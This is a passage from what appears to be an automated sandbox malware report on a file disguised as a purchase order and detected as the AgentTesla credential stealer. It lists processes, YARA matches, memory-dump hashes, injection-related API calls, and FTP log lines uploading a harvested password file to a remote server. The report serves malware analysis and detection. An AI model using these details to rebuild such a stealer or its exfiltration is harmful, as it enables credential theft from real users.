                                                        Oct 7, 2024 09:13:57.529722929 CEST21497435.2.84.236192.168.2.4227 Entering Passive Mode (5,2,84,236,193,232)
                                                        Oct 7, 2024 09:13:57.535391092 CEST4974321192.168.2.45.2.84.236STOR PW_user-377142_2024_10_07_03_13_54.html
                                                        Oct 7, 2024 09:13:58.222192049 CEST21497435.2.84.236192.168.2.4150 Accepted data connection
                                                        Oct 7, 2024 09:13:58.482342005 CEST21497435.2.84.236192.168.2.4226-File successfully transferred
                                                        226-File successfully transferred226 0.260 seconds (measured here), 1.20 Kbytes per second


                                                        Target ID:0
                                                        Start time:03:13:29
                                                        Start date:07/10/2024
                                                        Path:C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe"
                                                        Imagebase:0x100000
                                                        File size:2'945'024 bytes
                                                        MD5 hash:68B39CED0840D43E3A03E2F92C268C72
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1748074888.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:03:13:33
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0xef0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1857971492.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1857971492.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:03:13:42
                                                        Start date:07/10/2024
                                                        Path:C:\Users\user\AppData\Roaming\Avycqjqvmh.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\Avycqjqvmh.exe"
                                                        Imagebase:0x900000
                                                        File size:2'945'024 bytes
                                                        MD5 hash:68B39CED0840D43E3A03E2F92C268C72
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.1856237995.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 63%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:03:13:45
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0xd0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1937354915.000000000243C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1937354915.000000000243C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:03:13:50
                                                        Start date:07/10/2024
                                                        Path:C:\Users\user\AppData\Roaming\Avycqjqvmh.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\Avycqjqvmh.exe"
                                                        Imagebase:0x6b0000
                                                        File size:2'945'024 bytes
                                                        MD5 hash:68B39CED0840D43E3A03E2F92C268C72
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1966327299.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:03:13:53
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0xbe0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2951059742.0000000003087000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:10.5%
                                                          Dynamic/Decrypted Code Coverage:91.5%
                                                          Signature Coverage:24.5%
                                                          Total number of Nodes:106
                                                          Total number of Limit Nodes:9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                          • API String ID: 0-312445597
                                                          • Opcode ID: 8b3c27a589edaea19c0e3cc4d7dc81b76311399e0fbf3987986d7ec663353ea0
                                                          • Instruction ID: 29a80cbc5957428f7c1cb62378f32bfa22677a3ff93d66047874714de892c9cb
                                                          • Opcode Fuzzy Hash: 8b3c27a589edaea19c0e3cc4d7dc81b76311399e0fbf3987986d7ec663353ea0
                                                          • Instruction Fuzzy Hash: D8B20934A002188FDB18DFA4C894BADBBB6FF48710F158599E905AB3A5DB70ED85CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                          • API String ID: 0-2546334966
                                                          • Opcode ID: 18f5687e28659200681dba21703b1d4c20f590f47413c190be5981d5c6f4e65f
                                                          • Instruction ID: 4192cbdd4357fc9adef26786e2eddce3fce99bc7b34e97a812ad15a66388f778
                                                          • Opcode Fuzzy Hash: 18f5687e28659200681dba21703b1d4c20f590f47413c190be5981d5c6f4e65f
                                                          • Instruction Fuzzy Hash: 6922FB74A00218CFDB18DF64C894BA9B7B2FF88714F1481D9E909AB295DB71ED85CF50

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJcq$Te^q$pbq$xbaq
                                                          • API String ID: 0-1954897716
                                                          • Opcode ID: cd465836d443bf360e9c398bd60cc992ee8737fe7cf1280ef1e76ab0864e779e
                                                          • Instruction ID: 55a6ab6d29a9222f4ea0e726a569696f141b33422bef031d7aab6e3e017bb718
                                                          • Opcode Fuzzy Hash: cd465836d443bf360e9c398bd60cc992ee8737fe7cf1280ef1e76ab0864e779e
                                                          • Instruction Fuzzy Hash: 3CA2B675A00228DFDB64CF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2y$Te^q$Te^q
                                                          • API String ID: 0-969158955
                                                          • Opcode ID: ea7f872773a805b62f159305ab1deaf38b7119303f4a57c7ab0d04ffb8c85d61
                                                          • Instruction ID: 49ceb6cbfca235fa782014107979e81b39fa187c57792087ecf5ba3746a6d695
                                                          • Opcode Fuzzy Hash: ea7f872773a805b62f159305ab1deaf38b7119303f4a57c7ab0d04ffb8c85d61
                                                          • Instruction Fuzzy Hash: 44F1F970E45258CFDB28CF69C894BADBBF2FB49310F2095E9E809A7255DB746981CF00

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fcq$8
                                                          • API String ID: 0-89531850
                                                          • Opcode ID: 05381b4a6cfa6966f0d33ec9b70397acb50454e9b2fc5ad5ff5ee3f4f635f87a
                                                          • Instruction ID: 14ce06e36a1a252d4a90add6bbeabdf51c6bf976dfc4d9dc74b2172d2e848f11
                                                          • Opcode Fuzzy Hash: 05381b4a6cfa6966f0d33ec9b70397acb50454e9b2fc5ad5ff5ee3f4f635f87a
                                                          • Instruction Fuzzy Hash: B342B475D006298BDB64DF69C850AD9B7B2FF89300F1486EAD40DA7251EB30AE85CF90

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fcq$h
                                                          • API String ID: 0-1849521214
                                                          • Opcode ID: e87247bb739cb4bfc9c4154323cdaf6e1feff71e65f316196b516374600f6551
                                                          • Instruction ID: 94e04833a794a969ad00b519376214b18b03e6df979298e05d2e6813cb251d00
                                                          • Opcode Fuzzy Hash: e87247bb739cb4bfc9c4154323cdaf6e1feff71e65f316196b516374600f6551
                                                          • Instruction Fuzzy Hash: D1915B71D056698FDB15DF69CCA07C9BBB2EF89300F04C1EAC44DAB252DA305A89CF95

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2
                                                          • API String ID: 0-450215437
                                                          • Opcode ID: c7d45bd4806f6609cbc568e81556bcdf1935a7a9a67e1844bf8b9cdf90f8eb5b
                                                          • Instruction ID: 9792572bbd258eec18fa14205848c4fb93dd8eeff850667ed2022b0dd1e2c177
                                                          • Opcode Fuzzy Hash: c7d45bd4806f6609cbc568e81556bcdf1935a7a9a67e1844bf8b9cdf90f8eb5b
                                                          • Instruction Fuzzy Hash: BAC2B1B4E012288FDB65DF69C984BD9BBB6FB88300F1081E9D509AB355DB709E85CF41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq
                                                          • API String ID: 0-149360118
                                                          • Opcode ID: fc7c29f124dd73d876870aed790faa4e15b078e58e12ad2e881f2f9b055e4f21
                                                          • Instruction ID: 366a31fbe2fd9e2e77e5df5b52d311aace7099be96da6dceec7edf54e63ea668
                                                          • Opcode Fuzzy Hash: fc7c29f124dd73d876870aed790faa4e15b078e58e12ad2e881f2f9b055e4f21
                                                          • Instruction Fuzzy Hash: 6E325A75B006158FCB18DFA9C495A6EBBF2FF88300F24896DE55AD7381CB34A901CB91
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B44CD5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 865a22b6aff82959764f061ae66d9c04c5499ac8955355578c8798b2a7a56b86
                                                          • Instruction ID: e6c71c9c68ebd6bc837e18878558d2f553f9ad05a3579c1d9abcd610f2e621e2
                                                          • Opcode Fuzzy Hash: 865a22b6aff82959764f061ae66d9c04c5499ac8955355578c8798b2a7a56b86
                                                          • Instruction Fuzzy Hash: D24188B5D002589FCF10CFAAD980ADEFBB5FB49310F14A42AE819B7200D735A951DF58
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B44CD5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 4e71955061e0df9b90501e21b22ec4a75580fbfb1382a1d57abbb501ea65e356
                                                          • Instruction ID: 520785909837170865c6e57fdf7bda9d218832fbea7738c29c256f5a22dbfb0b
                                                          • Opcode Fuzzy Hash: 4e71955061e0df9b90501e21b22ec4a75580fbfb1382a1d57abbb501ea65e356
                                                          • Instruction Fuzzy Hash: 8D41A8B9D00218DFCF10CFAAD981ADEFBB1BB09310F14A42AE818B7200C735A951CF58
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 05B465EE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 605ef968fb5e9bbfc5b492ac6200da6628bcf53c27a852e7790c3b587c477111
                                                          • Instruction ID: de87cdf2ce2e71aec71dc2274867a9c4e4a6e09299b8392bb42b08e4a82a6b31
                                                          • Opcode Fuzzy Hash: 605ef968fb5e9bbfc5b492ac6200da6628bcf53c27a852e7790c3b587c477111
                                                          • Instruction Fuzzy Hash: E531B7B5D012189FCB10CFAAD980AEEFBF5BB49310F24942AE819B7300D775A941CF94
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 05B465EE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 872f5c2ef39ca2b26427bc2fbe99e702c50bee12a4e74470c30221ea12d4ce1e
                                                          • Instruction ID: 98bb376da35393d801af3d0974a12de225abf314a50291caf603e746f838d0c4
                                                          • Opcode Fuzzy Hash: 872f5c2ef39ca2b26427bc2fbe99e702c50bee12a4e74470c30221ea12d4ce1e
                                                          • Instruction Fuzzy Hash: 9931A8B5D012189FCB10CFAAD980ADEFBF5BB49310F20942AE819B7300C775A945CF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Deq
                                                          • API String ID: 0-948982800
                                                          • Opcode ID: 9a0e6b0b8decb7e38ac9139726232ab3471e58f3cc53932103ba273197c6e0b8
                                                          • Instruction ID: 83ad30e117885850ab9fafb3cb32ddeadfe4aa54ad9ce65bb7988201b6811912
                                                          • Opcode Fuzzy Hash: 9a0e6b0b8decb7e38ac9139726232ab3471e58f3cc53932103ba273197c6e0b8
                                                          • Instruction Fuzzy Hash: 07D1C574E00218CFDB58DF69D990A9DBBB2FF88304F1080A9E409AB365DB759D81CF51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH^q
                                                          • API String ID: 0-2549759414
                                                          • Opcode ID: 8c53ab032ad20f6e0c9154f32ea4b75944bafa87cd1c25bb23883b9c8c43acd3
                                                          • Instruction ID: c19f0efb446533dbb156ff2b5d08aa80cabbd32217bc8c61133d81f8bbd05a98
                                                          • Opcode Fuzzy Hash: 8c53ab032ad20f6e0c9154f32ea4b75944bafa87cd1c25bb23883b9c8c43acd3
                                                          • Instruction Fuzzy Hash: E0C1E370E09398CFDB24CFA9D984BADBBF2FB89304F1094A9D409A7255DB745985CF02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te^q
                                                          • API String ID: 0-671973202
                                                          • Opcode ID: 1df56c72eda21321f29d4b7717dfb1da7cb2c7c32d1a08245185dc4fdd56a204
                                                          • Instruction ID: 10e2ab512e3058f98730ce6e65876cadcc76a3434bd0f9f4ec0a92ac27f8bb4e
                                                          • Opcode Fuzzy Hash: 1df56c72eda21321f29d4b7717dfb1da7cb2c7c32d1a08245185dc4fdd56a204
                                                          • Instruction Fuzzy Hash: E4B10974E00248CFDB18DFA9D884BADBBF2FB89310F14D1AAD919A7255DB746985CF00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH^q
                                                          • API String ID: 0-2549759414
                                                          • Opcode ID: a962207045dbf2bbfb4fad3ae0802d705fe4b861a0653cfd47dd762ab3e49e0b
                                                          • Instruction ID: e71ce2a9d87df58e55fba29a7a6fd70be7ad2405cf64789d9a27f55b8aef6a27
                                                          • Opcode Fuzzy Hash: a962207045dbf2bbfb4fad3ae0802d705fe4b861a0653cfd47dd762ab3e49e0b
                                                          • Instruction Fuzzy Hash: 94B1F370D05398CFDB24CFA9D984BADBBF2FB89304F1094AAD409AB255DB745985CF02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te^q
                                                          • API String ID: 0-671973202
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te^q
                                                          • API String ID: 0-671973202
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dbq
                                                          • API String ID: 0-1887291361
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dbq
                                                          • API String ID: 0-1887291361
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
